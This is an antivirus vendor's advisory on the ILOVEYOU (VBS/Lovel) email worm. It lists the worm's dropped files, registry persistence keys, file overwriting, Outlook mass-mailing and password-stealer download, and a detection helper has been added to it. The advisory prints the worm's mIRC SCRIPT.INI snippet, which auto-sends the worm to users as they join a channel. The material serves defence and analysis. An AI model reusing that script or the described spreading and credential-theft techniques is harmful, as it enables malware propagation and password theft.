Virus Name:

VBS/Lovel

Date Added: 5/4/2000

Virus Information

Discovery Date: 4/4/2000
Origin: Philippines
Type: Virus
SubType: VbScript
Risk Assessment: High-Outbreak
Minimum Dat: 4077
Minimum Engine: 4.0.35

Virus Characteristics

This worm is a VBS program that is sent attached to an email with the subject ILOVEYOU. The mail contains the message "kindly check the attached LOVELETTER coming from me."

The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs

If the user runs the attachment the worm runs using the Windows Scripting Host program. This is not normally present on Windows 95 or Windows NT unless Internet Explorer 5 is installed.

When the worm is first run it drops copies of itself in the following places:

  • C:\WINDOWS\SYSTEM\MSKERNEL32.VBS
  • C:\WINDOWS\WIN32DLL.VBS
  • C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS

It also adds the registry values:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 = C:\WINDOWS\SYSTEM\MSKernel32.vbs
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL = C:\WINDOWS\Win32DLL.vbs

in order to run the worm at system startup.

The worm replaces the following files:

  • *.JPG
  • *.JPEG
  • *.MP3
  • *.MP2

with copies of itself and it adds the extension .VBS to the original filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm.

The worm also overwrites the following files:

  • *.VBS
  • *.VBE
  • *.JS
  • *.JSE
  • *.CSS
  • *.WSH
  • *.SCT
  • *.HTA

with copies of itself and renames the files to *.VBS.

The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and this is then sent to the IRC channels if the mIRC client is installed. This is accomplished by the worm replacing the file SCRIPT.INI with the following script:

[script]
  n0=on 1:JOIN:#:{
  n1= /if ( $nick == $me ) { halt }
  n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
  n3=}

After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries in the address book. The mails will be of the same format as the original mail.

This worm also has another trick up its sleeve in that it tries to download and install an executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password stealing program that will email any cached passwords to the mail address MAILME@SUPER.NET.PH

In order to facilitate this download the worm sets the start-up page of Microsoft Internet Explorer to point to the web-page containing the password stealing trojan.
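As an added illustration (not part of the original advisory), the indicators described above can be turned into a small triage helper for mail logs, Run/RunServices exports and a mIRC SCRIPT.INI. The file names, registry values and script contents are the ones listed in this advisory; the mail samples in the test are constructed.

```python
import re
from typing import Dict, List

# Indicators taken from the advisory above (not a complete signature set).
DROPPED_FILES = {
    r"c:\windows\system\mskernel32.vbs",
    r"c:\windows\win32dll.vbs",
    r"c:\windows\system\love-letter-for-you.txt.vbs",
}
RUN_VALUES = {
    "mskernel32": r"c:\windows\system\mskernel32.vbs",
    "win32dll": r"c:\windows\win32dll.vbs",
}
# Double extension: a harmless-looking extension followed by a script extension
# handled by the Windows Scripting Host (extensions listed in the advisory).
SCRIPT_EXT = ("vbs", "vbe", "js", "jse", "wsh", "sct", "hta")
DOUBLE_EXT = re.compile(r"\.(txt|jpg|jpeg|mp3|mp2)\.(" + "|".join(SCRIPT_EXT) + r")$", re.I)


def mail_indicators(subject: str, attachment: str) -> List[str]:
    """Return the indicators matched by one mail's subject and attachment name."""
    hits = []
    if subject.strip().upper() == "ILOVEYOU":
        hits.append("subject:ILOVEYOU")
    if attachment.lower() == "love-letter-for-you.txt.vbs":
        hits.append("attachment:known-name")
    if DOUBLE_EXT.search(attachment):
        hits.append("attachment:double-extension")
    return hits


def registry_indicators(run_values: Dict[str, str]) -> List[str]:
    """run_values maps value name -> command, as exported from Run/RunServices."""
    return [name for name, cmd in run_values.items()
            if RUN_VALUES.get(name.lower()) == cmd.lower()]


def dropped_file_indicators(paths: List[str]) -> List[str]:
    """Return the listed paths that match the worm's known drop locations."""
    return [p for p in paths if p.lower() in DROPPED_FILES]


def mirc_indicator(script_ini: str) -> bool:
    """True when SCRIPT.INI auto-sends LOVE-LETTER-FOR-YOU.HTM on channel JOIN."""
    text = script_ini.lower()
    return ("on 1:join:#:" in text and "dcc send" in text
            and "love-letter-for-you.htm" in text)
```

The script.ini check looks for the JOIN handler, the DCC send and the HTM name together, so an ordinary mIRC script with only one of them is not flagged.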

Symptoms
VirusScan 4.0.3+
Toolkit 8

Method Of Infection
VirusScan 4.0.3+
Toolkit 8

Removal Instructions

Script, Batch, Macro and non memory-resident:
Use specified engine and DAT files for detection and removal.

Note: It is very common for macro viruses to disable options within Office applications for example in Word, the macro protection warning commonly is disabled. After cleaning macro viruses, ensure that your previously set options are again enabled.

PE, Trojan, Internet Worm and memory resident:
Use specified engine and DAT files for detection. To remove, boot to MS-DOS mode or use an emergency boot diskette and use the command line scanner such as "SCANPM C: /CLEAN /ALL"

DAT not yet available: In the event you have this virus, trojan or Internet worm on your system(s) and the specified DAT is not yet available, refer to the documentation posted for submitting a sample to McAfee AVERT for resolution.

Source: http://www.nai.com/

Last updated: 19 June 2000
